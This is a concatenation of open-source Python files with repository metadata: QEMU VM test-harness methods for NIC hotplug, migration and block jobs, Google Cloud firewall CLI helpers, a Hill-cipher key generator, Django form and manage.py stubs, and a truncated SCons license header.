:param nic_index_or_name: name or index number for existing NIC
"""
error.context("Retrieving info for NIC %s on VM %s" % (
nic_index_or_name, self.name))
nic = self.virtnet[nic_index_or_name]
device_add_cmd = "device_add"
if nic.has_key('nic_model'):
device_add_cmd += ' driver=%s' % nic.nic_model
device_add_cmd += ",netdev=%s" % nic.device_id
if nic.has_key('mac'):
device_add_cmd += ",mac=%s" % nic.mac
device_add_cmd += ",id=%s" % nic.nic_name
if nic['nic_model'] == 'virtio-net-pci':
if int(nic['queues']) > 1:
device_add_cmd += ",mq=on"
if nic.has_key('vectors'):
device_add_cmd += ",vectors=%s" % nic.vectors
device_add_cmd += nic.get('nic_extra_params', '')
if nic.has_key('romfile'):
device_add_cmd += ",romfile=%s" % nic.romfile
error.context("Activating nic on VM %s with monitor command %s" % (
self.name, device_add_cmd))
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(device_add_cmd)
else:
self.monitor.send_args_cmd(device_add_cmd, convert=False)
error.context("Verifying nic %s shows in qtree" % nic.nic_name)
qtree = self.monitor.info("qtree")
if not nic.nic_name in qtree:
logging.error(qtree)
raise virt_vm.VMAddNicError("Device %s was not plugged into qdev"
"tree" % nic.nic_name)
@error.context_aware
def deactivate_nic(self, nic_index_or_name, wait=20):
"""
Reverses what activate_nic did
:param nic_index_or_name: name or index number for existing NIC
:param wait: Time test will wait for the guest to unplug the device
"""
nic = self.virtnet[nic_index_or_name]
error.context("Removing nic %s from VM %s" % (nic_index_or_name,
self.name))
nic_del_cmd = "device_del id=%s" % (nic.nic_name)
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(nic_del_cmd)
else:
self.monitor.send_args_cmd(nic_del_cmd, convert=True)
if wait:
logging.info("waiting for the guest to finish the unplug")
if not utils_misc.wait_for(lambda: nic.nic_name not in
self.monitor.info("qtree"),
wait, 5, 1):
raise virt_vm.VMDelNicError("Device is not unplugged by "
"guest, please check whether the "
"hotplug module was loaded in "
"guest")
@error.context_aware
def deactivate_netdev(self, nic_index_or_name):
"""
Reverses what activate_netdev() did
        :param nic_index_or_name: name or index number of an existing NIC
"""
# FIXME: Need to down interface & remove from bridge????
netdev_id = self.virtnet[nic_index_or_name].device_id
error.context("removing netdev id %s from vm %s" %
(netdev_id, self.name))
nic_del_cmd = "netdev_del id=%s" % netdev_id
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(nic_del_cmd)
else:
self.monitor.send_args_cmd(nic_del_cmd, convert=True)
network_info = self.monitor.info("network")
if netdev_id in network_info:
raise virt_vm.VMDelNetDevError("Fail to remove netdev %s" %
netdev_id)
@error.context_aware
def del_nic(self, nic_index_or_name):
"""
        Undefine nic parameters; reverses what add_nic did.
        :param nic_index_or_name: name or index number of an existing NIC
"""
super(VM, self).del_nic(nic_index_or_name)
@error.context_aware
def send_fd(self, fd, fd_name="migfd"):
"""
Send file descriptor over unix socket to VM.
:param fd: File descriptor.
        :param fd_name: File descriptor identifier in the VM.
"""
error.context("Send fd %d like %s to VM %s" % (fd, fd_name, self.name))
logging.debug("Send file descriptor %s to source VM.", fd_name)
if self.monitor.protocol == 'human':
self.monitor.cmd("getfd %s" % (fd_name), fd=fd)
elif self.monitor.protocol == 'qmp':
self.monitor.cmd("getfd", args={'fdname': fd_name}, fd=fd)
error.context()
def mig_finished(self):
ret = True
if (self.params["display"] == "spice" and
self.get_spice_var("spice_seamless_migration") == "on"):
s = self.monitor.info("spice")
if isinstance(s, str):
ret = "migrated: true" in s
else:
ret = s.get("migrated") == "true"
o = self.monitor.info("migrate")
if isinstance(o, str):
return ret and (not "status: active" in o)
else:
return ret and (o.get("status") != "active")
def mig_succeeded(self):
o = self.monitor.info("migrate")
if isinstance(o, str):
return "status: completed" in o
else:
return o.get("status") == "completed"
def mig_failed(self):
o = self.monitor.info("migrate")
if isinstance(o, str):
return "status: failed" in o
else:
return o.get("status") == "failed"
def mig_cancelled(self):
if self.mig_succeeded():
raise virt_vm.VMMigrateCancelError(
"Migration completed successfully")
elif self.mig_failed():
raise virt_vm.VMMigrateFailedError("Migration failed")
o = self.monitor.info("migrate")
if isinstance(o, str):
return ("Migration status: cancelled" in o or
"Migration status: canceled" in o)
else:
return (o.get("status") == "cancelled" or
o.get("status") == "canceled")
def wait_for_migration(self, timeout):
if not utils_misc.wait_for(self.mig_finished, timeout, 2, 2,
"Waiting for migration to complete"):
raise virt_vm.VMMigrateTimeoutError("Timeout expired while waiting"
" for migration to finish")
@error.context_aware
def migrate(self, timeout=virt_vm.BaseVM.MIGRATE_TIMEOUT, protocol="tcp",
cancel_delay=None, offline=False, stable_check=False,
clean=True, save_path="/tmp", dest_host="localhost",
remote_port=None, not_wait_for_migration=False,
fd_src=None, fd_dst=None, migration_exec_cmd_src=None,
migration_exec_cmd_dst=None):
"""
Migrate the VM.
If the migration is local, the VM object's state is switched with that
of the destination VM. Otherwise, the state is switched with that of
a dead VM (returned by self.clone()).
:param timeout: Time to wait for migration to complete.
:param protocol: Migration protocol (as defined in MIGRATION_PROTOS)
:param cancel_delay: If provided, specifies a time duration after which
migration will be canceled. Used for testing migrate_cancel.
:param offline: If True, pause the source VM before migration.
:param stable_check: If True, compare the VM's state after migration to
its state before migration and raise an exception if they
differ.
:param clean: If True, delete the saved state files (relevant only if
stable_check is also True).
        :param save_path: The path for state files.
:param dest_host: Destination host (defaults to 'localhost').
:param remote_port: Port to use for remote migration.
        :param not_wait_for_migration: If True, start the migration but do not
                wait for it to finish.
        :param fd_src: File descriptor to which the source VM writes migration
                data. The descriptor is closed during the migration.
        :param fd_dst: File descriptor from which the destination VM reads
                migration data.
:param migration_exec_cmd_src: Command to embed in '-incoming "exec: "'
(e.g. 'exec:gzip -c > filename') if migration_mode is 'exec'
default to listening on a random TCP port
:param migration_exec_cmd_dst: Command to embed in '-incoming "exec: "'
(e.g. 'gzip -c -d filename') if migration_mode is 'exec'
default to listening on a random TCP port
"""
if protocol not in self.MIGRATION_PROTOS:
raise virt_vm.VMMigrateProtoUnknownError(protocol)
error.base_context("migrating '%s'" % self.name)
local = dest_host == "localhost"
mig_fd_name = None
if protocol == "fd":
# Check if descriptors aren't None for local migration.
if local and (fd_dst is None or fd_src is None):
(fd_dst, fd_src) = os.pipe()
mig_fd_name = "migfd_%d_%d" % (fd_src, time.time())
self.send_fd(fd_src, mig_fd_name)
os.close(fd_src)
clone = self.clone()
if (local and not (migration_exec_cmd_src
and "gzip" in migration_exec_cmd_src)):
error.context("creating destination VM")
if stable_check:
# Pause the dest vm after creation
extra_params = clone.params.get("extra_params", "") + " -S"
clone.params["extra_params"] = extra_params
clone.create(migration_mode=protocol, mac_source=self,
migration_fd=fd_dst,
migration_exec_cmd=migration_exec_cmd_dst)
if fd_dst:
os.close(fd_dst)
error.context()
try:
if (self.params["display"] == "spice" and local and
not (protocol == "exec" and
(migration_exec_cmd_src and "gzip" in migration_exec_cmd_src))):
host_ip = utils_net.get_host_ip_address(self.params)
dest_port = clone.spice_options.get('spice_port', '')
if self.params.get("spice_ssl") == "yes":
dest_tls_port = clone.spice_options.get("spice_tls_port",
"")
cert_s = clone.spice_options.get("spice_x509_server_subj",
"")
cert_subj = "%s" % cert_s[1:]
cert_subj += host_ip
cert_subj = "\"%s\"" % cert_subj
else:
dest_tls_port = ""
cert_subj = ""
logging.debug("Informing migration to spice client")
commands = ["__com.redhat_spice_migrate_info",
"spice_migrate_info",
"client_migrate_info"]
for command in commands:
try:
self.monitor.verify_supported_cmd(command)
except qemu_monitor.MonitorNotSupportedCmdError:
continue
# spice_migrate_info requires host_ip, dest_port
# client_migrate_info also requires protocol
cmdline = "%s hostname=%s" % (command, host_ip)
if command == "client_migrate_info":
cmdline += " ,protocol=%s" % self.params['display']
if dest_port:
cmdline += ",port=%s" % dest_port
if dest_tls_port:
cmdline += ",tls-port=%s" % dest_tls_port
if cert_subj:
cmdline += ",cert-subject=%s" % cert_subj
break
self.monitor.send_args_cmd(cmdline)
if protocol in ["tcp", "rdma", "x-rdma"]:
if local:
uri = protocol + ":localhost:%d" % clone.migration_port
else:
uri = protocol + ":%s:%d" % (dest_host, remote_port)
elif protocol == "unix":
uri = "unix:%s" % clone.migration_file
elif protocol == "exec":
if local:
if not migration_exec_cmd_src:
uri = '"exec:nc localhost %s"' % clone.migration_port
else:
uri = '"exec:%s"' % (migration_exec_cmd_src)
else:
uri = '"exec:%s"' % (migration_exec_cmd_src)
elif protocol == "fd":
uri = "fd:%s" % mig_fd_name
if offline is True:
self.monitor.cmd("stop")
logging.info("Migrating to %s", uri)
self.monitor.migrate(uri)
if not_wait_for_migration:
return clone
if cancel_delay:
time.sleep(cancel_delay)
self.monitor.cmd("migrate_cancel")
if not utils_misc.wait_for(self.mig_cancelled, 60, 2, 2,
"Waiting for migration "
"cancellation"):
raise virt_vm.VMMigrateCancelError(
"Cannot cancel migration")
return
self.wait_for_migration(timeout)
if (local and (migration_exec_cmd_src
and "gzip" in migration_exec_cmd_src)):
error.context("creating destination VM")
if stable_check:
# Pause the dest vm after creation
extra_params = clone.params.get("extra_params", "") + " -S"
clone.params["extra_params"] = extra_params
clone.create(migration_mode=protocol, mac_source=self,
migration_fd=fd_dst,
migration_exec_cmd=migration_exec_cmd_dst)
self.verify_alive()
# Report migration status
if self.mig_succeeded():
logging.info("Migration completed successfully")
elif self.mig_failed():
raise virt_vm.VMMigrateFailedError("Migration failed")
else:
raise virt_vm.VMMigrateFailedError("Migration ended with "
"unknown status")
# Switch self <-> clone
temp = self.clone(copy_state=True)
self.__dict__ = clone.__dict__
clone = temp
# From now on, clone is the source VM that will soon be destroyed
# and self is the destination VM that will remain alive. If this
# is remote migration, self is a dead VM object.
error.context("after migration")
if local:
time.sleep(1)
self.verify_kernel_crash()
self.verify_alive()
if local and stable_check:
try:
save1 = os.path.join(save_path, "src-" + clone.instance)
save2 = os.path.join(save_path, "dst-" + self.instance)
clone.save_to_file(save1)
self.save_to_file(save2)
# Fail if we see deltas
md5_save1 = utils.hash_file(save1)
md5_save2 = utils.hash_file(save2)
if md5_save1 != md5_save2:
raise virt_vm.VMMigrateStateMismatchError()
finally:
if clean:
if os.path.isfile(save1):
os.remove(save1)
if os.path.isfile(save2):
os.remove(save2)
finally:
# If we're doing remote migration and it's completed successfully,
# self points to a dead VM object
if not not_wait_for_migration:
if self.is_alive():
self.monitor.cmd("cont")
clone.destroy(gracefully=False)
@error.context_aware
def reboot(self, session=None, method="shell", nic_index=0,
timeout=virt_vm.BaseVM.REBOOT_TIMEOUT):
"""
Reboot the VM and wait for it to come back up by trying to log in until
timeout expires.
:param session: A shell session object or None.
:param method: Reboot method. Can be "shell" (send a shell reboot
command) or "system_reset" (send a system_reset monitor command).
:param nic_index: Index of NIC to access in the VM, when logging in
after rebooting.
:param timeout: Time to wait for login to succeed (after rebooting).
:return: A new shell session object.
"""
error.base_context("rebooting '%s'" % self.name, logging.info)
error.context("before reboot")
error.context()
if method == "shell":
session = session or self.login()
session.sendline(self.params.get("reboot_command"))
error.context("waiting for guest to go down", logging.info)
if not utils_misc.wait_for(
lambda:
not session.is_responsive(
timeout=self.CLOSE_SESSION_TIMEOUT),
timeout / 2, 0, 1):
raise virt_vm.VMRebootError("Guest refuses to go down")
session.close()
elif method == "system_reset":
# Clear the event list of all QMP monitors
qmp_monitors = [m for m in self.monitors if m.protocol == "qmp"]
for m in qmp_monitors:
m.clear_events()
# Send a system_reset monitor command
self.monitor.cmd("system_reset")
# Look for RESET QMP events
time.sleep(1)
for m in qmp_monitors:
if m.get_event("RESET"):
logging.info("RESET QMP event received")
else:
raise virt_vm.VMRebootError("RESET QMP event not received "
"after system_reset "
"(monitor '%s')" % m.name)
else:
raise virt_vm.VMRebootError("Unknown reboot method: %s" % method)
if self.params.get("mac_changeable") == "yes":
utils_net.update_mac_ip_address(self, self.params)
error.context("logging in after reboot", logging.info)
return self.wait_for_login(nic_index, timeout=timeout)
def send_key(self, keystr):
"""
Send a key event to the VM.
:param keystr: A key event string (e.g. "ctrl-alt-delete")
"""
# For compatibility with versions of QEMU that do not recognize all
# key names: replace keyname with the hex value from the dict, which
# QEMU will definitely accept
key_mapping = {"semicolon": "0x27",
"comma": "0x33",
"dot": "0x34",
"slash": "0x35"}
for key, value in key_mapping.items():
keystr = keystr.replace(key, value)
self.monitor.sendkey(keystr)
time.sleep(0.2)
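    # Illustrative note (not from the original source): with the mapping above,
    # send_key("ctrl-alt-dot") actually sends "ctrl-alt-0x34" to the monitor.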
# should this really be expected from VMs of all hypervisor types?
def screendump(self, filename, debug=True):
try:
if self.monitor:
self.monitor.screendump(filename=filename, debug=debug)
except qemu_monitor.MonitorError, e:
logging.warn(e)
def save_to_file(self, path):
"""
Override BaseVM save_to_file method
"""
self.verify_status('paused') # Throws exception if not
        # Set a very high migration speed (2 << 39 B/s = 1 TiB/s) so the save is not throttled
self.monitor.migrate_set_speed(str(2 << 39))
self.monitor.migrate_set_downtime(self.MIGRATE_TIMEOUT)
logging.debug("Saving VM %s to %s" % (self.name, path))
# Can only check status if background migration
self.monitor.migrate("exec:cat>%s" % path, wait=False)
utils_misc.wait_for(
# no monitor.migrate-status method
lambda:
re.search("(status.*completed)",
str(self.monitor.info("migrate")), re.M),
self.MIGRATE_TIMEOUT, 2, 2,
"Waiting for save to %s to complete" % path)
# Restore the speed and downtime to default values
self.monitor.migrate_set_speed(str(32 << 20))
self.monitor.migrate_set_downtime(0.03)
# Base class defines VM must be off after a save
self.monitor.cmd("system_reset")
self.verify_status('paused') # Throws exception if not
def restore_from_file(self, path):
"""
Override BaseVM restore_from_file method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Restoring VM %s from %s" % (self.name, path))
# Rely on create() in incoming migration mode to do the 'right thing'
self.create(name=self.name, params=self.params, root_dir=self.root_dir,
timeout=self.MIGRATE_TIMEOUT, migration_mode="exec",
migration_exec_cmd="cat " + path, mac_source=self)
self.verify_status('running') # Throws exception if not
def savevm(self, tag_name):
"""
Override BaseVM savevm method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Saving VM %s to %s" % (self.name, tag_name))
self.monitor.send_args_cmd("savevm id=%s" % tag_name)
self.monitor.cmd("system_reset")
self.verify_status('paused') # Throws exception if not
def loadvm(self, tag_name):
"""
Override BaseVM loadvm method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Loading VM %s from %s" % (self.name, tag_name))
self.monitor.send_args_cmd("loadvm id=%s" % tag_name)
self.verify_status('paused') # Throws exception if not
def pause(self):
"""
Pause the VM operation.
"""
self.monitor.cmd("stop")
def resume(self):
"""
Resume the VM operation in case it's stopped.
"""
self.monitor.cmd("cont")
def set_link(self, netdev_name, up):
"""
Set link up/down.
        :param netdev_name: Link name
        :param up: Bool value, True to bring the link up, False to take it down
"""
self.monitor.set_link(netdev_name, up)
def get_block_old(self, blocks_info, p_dict={}):
"""
Get specified block device from monitor's info block command.
        The block device is identified by the parameters in p_dict.
        :param p_dict: Dictionary of parameter/value pairs used to identify
                the block device.
        :param blocks_info: the results of the monitor command 'info block'
        :return: Matched block device name, or None when no device matches.
"""
if isinstance(blocks_info, str):
for block in blocks_info.splitlines():
match = True
for key, value in p_dict.iteritems():
if value is True:
check_str = "%s=1" % key
elif value is False:
check_str = "%s=0" % key
else:
check_str = "%s=%s" % (key, value)
if check_str not in block:
match = False
break
if match:
return block.split(":")[0]
else:
for block in blocks_info:
match = True
for key, value in p_dict.iteritems():
if isinstance(value, bool):
check_str = "u'%s': %s" % (key, value)
else:
check_str = "u'%s': u'%s'" % (key, value)
if check_str not in str(block):
match = False
break
if match:
return block['device']
return None
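    # Illustrative note (not from the original source): with the old text
    # format, get_block_old(blocks_info, {"removable": False}) matches a line
    # containing "removable=0" and returns the device name before the first
    # ":"; with the new dict format it matches "u'removable': False" and
    # returns block['device'].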
def process_info_block(self, blocks_info):
"""
        Process the 'info block' output so that both the new and the old QEMU
        formats can be handled.
:param blocks_info: the output of qemu command
'info block'
"""
block_list = []
block_entry = []
for block in blocks_info.splitlines():
if block:
block_entry.append(block.strip())
else:
block_list.append(' '.join(block_entry))
block_entry = []
# don't forget the last one
block_list.append(' '.join(block_entry))
return block_list
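    # Illustrative example (not from the original source): for 'info block'
    # output such as
    #   drive0: removable=0 file=a.qcow2
    #   <blank line>
    #   drive1: removable=1 locked=0
    # process_info_block() returns one joined string per device, e.g.
    #   ["drive0: removable=0 file=a.qcow2", "drive1: removable=1 locked=0"]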
def get_block(self, p_dict={}):
"""
Get specified block device from monitor's info block command.
        The block device is identified by the parameters in p_dict.
        :param p_dict: Dictionary of parameter/value pairs used to identify
                the block device.
        :return: Matched block device name, or None when no device matches.
"""
blocks_info = self.monitor.info("block")
block = self.get_block_old(blocks_info, p_dict)
if block:
return block
block_list = self.process_info_block(blocks_info)
for block in block_list:
for key, value in p_dict.iteritems():
                # For new qemu we only handle the keys 'removable', 'file' and
                # 'backing_file'; other key types should be fixed up later.
logging.info("block = %s" % block)
if key == 'removable':
if value is False:
if not 'Removable device' in block:
return block.split(":")[0]
elif value is True:
if 'Removable device' in block:
return block.split(":")[0]
# file in key means both file and backing_file
if ('file' in key) and (value in block):
return block.split(":")[0]
return None
def check_block_locked(self, value):
"""
Check whether specified block device is locked or not.
        Return True if the device is locked, else False.
:param value: Parameter that can specify block device.
Can be any possible identification of a device,
Such as device name/image file name/...
:return: True if device is locked, False if device is unlocked.
"""
assert value, "Device identification not specified"
blocks_info = self.monitor.info("block")
assert value in str(blocks_info), \
"Device %s not listed in monitor's output" % value
if isinstance(blocks_info, str):
lock_str = "locked=1"
lock_str_new = "locked"
no_lock_str = "not locked"
for block in blocks_info.splitlines():
if (value in block) and (lock_str in block):
return True
# deal with new qemu
block_list = self.process_info_block(blocks_info)
for block_new in block_list:
if (value in block_new) and ("Removable device" in block_new):
if no_lock_str in block_new:
return False
elif lock_str_new in block_new:
return True
else:
for block in blocks_info:
if value in str(block):
return block['locked']
return False
def live_snapshot(self, base_file, snapshot_file,
snapshot_format="qcow2"):
"""
Take a live disk snapshot.
:param base_file: base file name
:param snapshot_file: snapshot file name
:param snapshot_format: snapshot file format
:return: File name of disk snapshot.
"""
device = self.get_block({"file": base_file})
output = self.monitor.live_snapshot(device, snapshot_file,
snapshot_format)
logging.debug(output)
device = self.get_block({"file": snapshot_file})
if device:
current_file = device
else:
current_file = None
return current_file
def block_stream(self, device, speed, base=None, correct=True):
"""
        Start streaming a block device (i.e. merge the snapshot).
:param device: device ID;
:param speed: limited speed, default unit B/s;
:param base: base file;
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_stream_cmd", "block-stream")
return self.monitor.block_stream(device, speed, base,
cmd, correct=correct)
def block_mirror(self, device, target, speed, sync,
format, mode="absolute-paths", correct=True):
"""
Mirror block device to target file;
:param device: device ID
:param target: destination image file name;
:param speed: max limited speed, default unit is B/s;
:param sync: what parts of the disk image should be copied to the
destination;
:param mode: new image open mode
:param format: target image format
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_mirror_cmd", "drive-mirror")
return self.monitor.block_mirror(device, target, speed, sync,
format, mode, cmd, correct=correct)
def block_reopen(self, device, new_image, format="qcow2", correct=True):
"""
        Reopen a new image; this step is not needed on a RHEL 7 host.
:param device: device ID
:param new_image: new image filename
:param format: new image format
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_reopen_cmd", "block-job-complete")
return self.monitor.block_reopen(device, new_image,
format, cmd, correct=correct)
def cancel_block_job(self, device, correct=True):
"""
        Cancel the active block job on the device.
:param device: device ID
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_job_cancel_cmd", "block-job-cancel")
return self.monitor.cancel_block_job(device, cmd, correct=correct)
def set_job_speed(self, device, speed="0", correct=True):
"""
set max speed of block job;
:param device: device ID
:param speed: max speed of block job
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("set_block_job_speed", "block-job-set-speed")
return self.monitor.set_block_job_speed(device, speed,
cmd, correct=correct)
def get_job_status(self, device):
"""
get block job info;
:param device: device ID
"""
return self.monitor.query_block_job(device)
|
spcui/virt-test
|
virttest/qemu_vm.py
|
Python
|
gpl-2.0
| 146,685 | 0.000389 |
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common classes and functions for firewall rules."""
import re
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import exceptions as calliope_exceptions
ALLOWED_METAVAR = 'PROTOCOL[:PORT[-PORT]]'
LEGAL_SPECS = re.compile(
r"""
(?P<protocol>[a-zA-Z0-9+.-]+) # The protocol group.
(:(?P<ports>\d+(-\d+)?))? # The optional ports group.
# May specify a range.
$ # End of input marker.
""",
re.VERBOSE)
def AddCommonArgs(parser, for_update=False):
"""Adds common arguments for firewall create or update subcommands."""
min_length = 0 if for_update else 1
switch = [] if min_length == 0 else None
allow = parser.add_argument(
'--allow',
metavar=ALLOWED_METAVAR,
type=arg_parsers.ArgList(min_length=min_length),
action=arg_parsers.FloatingListValuesCatcher(switch_value=switch),
help='The list of IP protocols and ports which will be allowed.',
required=not for_update)
allow.detailed_help = """\
A list of protocols and ports whose traffic will be allowed.
PROTOCOL is the IP protocol whose traffic will be allowed.
PROTOCOL can be either the name of a well-known protocol
(e.g., tcp or icmp) or the IP protocol number.
A list of IP protocols can be found at
link:http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml[].
A port or port range can be specified after PROTOCOL to
allow traffic through specific ports. If no port or port range
is specified, connections through all ranges are allowed. For
example, the following will create a rule that allows TCP traffic
through port 80 and allows ICMP traffic:
$ {command} MY-RULE --allow tcp:80 icmp
TCP and UDP rules must include a port or port range.
"""
if for_update:
allow.detailed_help += """
Setting this will override the current values.
"""
parser.add_argument(
'--description',
help='A textual description for the firewall rule.{0}'.format(
' Set to an empty string to clear existing.' if for_update else ''))
source_ranges = parser.add_argument(
'--source-ranges',
default=None if for_update else [],
metavar='CIDR_RANGE',
type=arg_parsers.ArgList(min_length=min_length),
action=arg_parsers.FloatingListValuesCatcher(switch_value=switch),
help=('A list of IP address blocks that may make inbound connections '
'in CIDR format.'))
source_ranges.detailed_help = """\
A list of IP address blocks that are allowed to make inbound
connections that match the firewall rule to the instances on
the network. The IP address blocks must be specified in CIDR
format:
link:http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing[].
"""
if for_update:
source_ranges.detailed_help += """
Setting this will override the existing source ranges for the firewall.
The following will clear the existing source ranges:
$ {command} MY-RULE --source-ranges
"""
else:
source_ranges.detailed_help += """
If neither --source-ranges nor --source-tags is provided, then this
flag will default to 0.0.0.0/0, allowing all sources. Multiple IP
address blocks can be specified if they are separated by spaces.
"""
source_tags = parser.add_argument(
'--source-tags',
default=None if for_update else [],
metavar='TAG',
type=arg_parsers.ArgList(min_length=min_length),
action=arg_parsers.FloatingListValuesCatcher(switch_value=switch),
help=('A list of instance tags indicating the set of instances on the '
'network which may make network connections that match the '
'firewall rule.'))
source_tags.detailed_help = """\
A list of instance tags indicating the set of instances on the
network which may make network connections that match the
firewall rule. If omitted, all instances on the network can
make connections that match the rule.
Tags can be assigned to instances during instance creation.
"""
if for_update:
source_tags.detailed_help += """
Setting this will override the existing source tags for the firewall.
The following will clear the existing source tags:
$ {command} MY-RULE --source-tags
"""
target_tags = parser.add_argument(
'--target-tags',
default=None if for_update else [],
metavar='TAG',
type=arg_parsers.ArgList(min_length=min_length),
action=arg_parsers.FloatingListValuesCatcher(switch_value=switch),
help=('A list of instance tags indicating the set of instances on the '
              'network which may accept inbound connections that match '
'the firewall rule.'))
target_tags.detailed_help = """\
A list of instance tags indicating the set of instances on the
    network which may accept inbound connections that match the
firewall rule. If omitted, all instances on the network can
receive inbound connections that match the rule.
Tags can be assigned to instances during instance creation.
"""
if for_update:
target_tags.detailed_help += """
Setting this will override the existing target tags for the firewall.
The following will clear the existing target tags:
$ {command} MY-RULE --target-tags
"""
parser.add_argument(
'name',
help='The name of the firewall rule to {0}'.format(
'update.' if for_update else 'create.'))
def ParseAllowed(allowed, message_classes):
"""Parses protocol:port mappings from --allow command line."""
allowed_value_list = []
for spec in allowed or []:
match = LEGAL_SPECS.match(spec)
if not match:
raise calliope_exceptions.ToolException(
'Firewall rules must be of the form {0}; received [{1}].'
.format(ALLOWED_METAVAR, spec))
if match.group('ports'):
ports = [match.group('ports')]
else:
ports = []
allowed_value_list.append(message_classes.Firewall.AllowedValueListEntry(
IPProtocol=match.group('protocol'),
ports=ports))
return allowed_value_list
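# Illustrative examples (not part of the original module) of what LEGAL_SPECS
# accepts for the --allow flag:
#   LEGAL_SPECS.match('tcp:80-443').group('protocol') == 'tcp'
#   LEGAL_SPECS.match('tcp:80-443').group('ports') == '80-443'
#   LEGAL_SPECS.match('icmp').group('ports') is None
#   LEGAL_SPECS.match('tcp:80,443') is None  # commas are rejected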
|
flgiordano/netcash
|
+/google-cloud-sdk/lib/googlecloudsdk/api_lib/compute/firewalls_utils.py
|
Python
|
bsd-3-clause
| 6,885 | 0.003631 |
#!/usr/bin/env python3
import random
import numpy as np
import sympy
mod_space = 29
'''
Generate Encryption Key
'''
# In --> size of matrix (n x n)
# Out --> List of lists [[1,2,3],[4,5,6],[7,8,9]]
def generate_encryption_key(size):
determinant = 0
    # Need to make sure the encryption key is invertible mod 29, i.e. det(key) % 29 != 0
while determinant == 0:
matrix = []
for i in range(size): # Repeat i times based on input size
row = []
for k in range(size):
# Add Random integer from 0 - mod space that we are working in
number = random.randint(0, mod_space)
row.append(number)
matrix.append(row) # Add row to matrix
# Convert list of lists into numpy array, which acts as a matrix
encryption_key = np.array(matrix)
try:
determinant = sympy.Matrix(encryption_key.tolist()).inv_mod(29).det()
except:
pass
# If matrix is invertible, end function and return matrix
#print(determinant)
#determinant = int(np.linalg.det(encryption_key))
return encryption_key
'''
Find Modular Inverse
'''
# In --> number, modspace (default is 29 for our case)
# Out --> modular inverse of number
def modular_inverse(num):
for i in range(mod_space): # Loop through possibile inverses in modspace
if (num * i) % mod_space == 1: # If i is an inverse for the number in modspace, return the number
return i
return False # If inverse does not exist, return False
'''
Generate Decryption Key
'''
# In --> Encryption Key (matrix form)
# Out --> Decryption Key
def generate_decryption_key(encryption_key):
# Take the prod of these 2 vars
key_inv = np.linalg.inv(encryption_key) # Inverse of encryption key
# Determinant of encryption key
det_key = int(np.linalg.det(encryption_key))
#print((key_inv * (det_key) * modular_inverse(det_key)) % 29)
# How to get multiplicative inverse of det(key) % 29
# If key = [[1,2],[3,4]] , det(key) % 29 == 27 and
## inverse(det(key) % 29) == 14
##
##
# How do we get from 27 to 14?
##
# (det_key_mod * x) % 29 = inv --> solve for x
# x == 14 in our example
det_key_mod = int(det_key % 29) # Determinant of encryption key mod 29
# Find modular inverse of above var using function defined above
det_key_mod_inv = int(modular_inverse(det_key_mod))
#print(det_key_mod, det_key_mod_inv)
# Final decryption key for [[1,2],[3,4]] is [[27,1],[16,14]]
# decryption_key = inv(det(key)mod29) * (det(key) * inv(key)) % 29
decryption_key = (key_inv * det_key)
#decryption_key = np.around(decryption_key)
#decryption_key = decryption_key.astype(int)
decryption_key = (det_key_mod_inv * decryption_key) % 29
decryption_key = np.around(decryption_key, 0)
#print(decryption_key)
return decryption_key
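# Illustrative, self-contained check (not part of the original script) of the
# mod-29 inverse arithmetic described in the comments above, using the example
# key [[1, 2], [3, 4]]:
def _demo_modular_inverse_check():
    example_det = (1 * 4 - 2 * 3) % mod_space   # det([[1, 2], [3, 4]]) % 29 == 27
    det_inverse = modular_inverse(example_det)  # 14, since (27 * 14) % 29 == 1
    return (example_det * det_inverse) % mod_space == 1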
def generate_sympy_decryption_key(encryption_key):
encryption_key = sympy.Matrix(encryption_key.tolist())
#key_inverse = encryption_key ** -1
#key_determinant = encryption_key.det()
decryption_key = np.array(encryption_key.inv_mod(29))
#key_determinant_mod = key_determinant % 29
return decryption_key
#x = np.array([[1,2],[3,4]])
# print(x)
#x = generate_encryption_key(4)
#generate_sympy_decryption_key(x)
#print(x)
#res = generate_decryption_key(x)
|
jbloom512/Linear_Algebra_Encryption
|
Generate_Encryption_Key.py
|
Python
|
mit
| 3,446 | 0.006384 |
from django.forms import ModelForm
from bug_reporting.models import Feedback
from CoralNet.forms import FormHelper
class FeedbackForm(ModelForm):
class Meta:
model = Feedback
fields = ('type', 'comment') # Other fields are auto-set
#error_css_class = ...
#required_css_class = ...
def clean(self):
"""
1. Strip spaces from character fields.
2. Call the parent's clean() to finish up with the default behavior.
"""
data = FormHelper.stripSpacesFromFields(
self.cleaned_data, self.fields)
self.cleaned_data = data
return super(FeedbackForm, self).clean()
|
DevangS/CoralNet
|
bug_reporting/forms.py
|
Python
|
bsd-2-clause
| 661 | 0.006051 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mobilepolls.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
jacol12345/TP-ankiety-web-app
|
mobilepolls/manage.py
|
Python
|
mit
| 254 | 0 |
#
# Copyright (c) 2001 - 2019 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
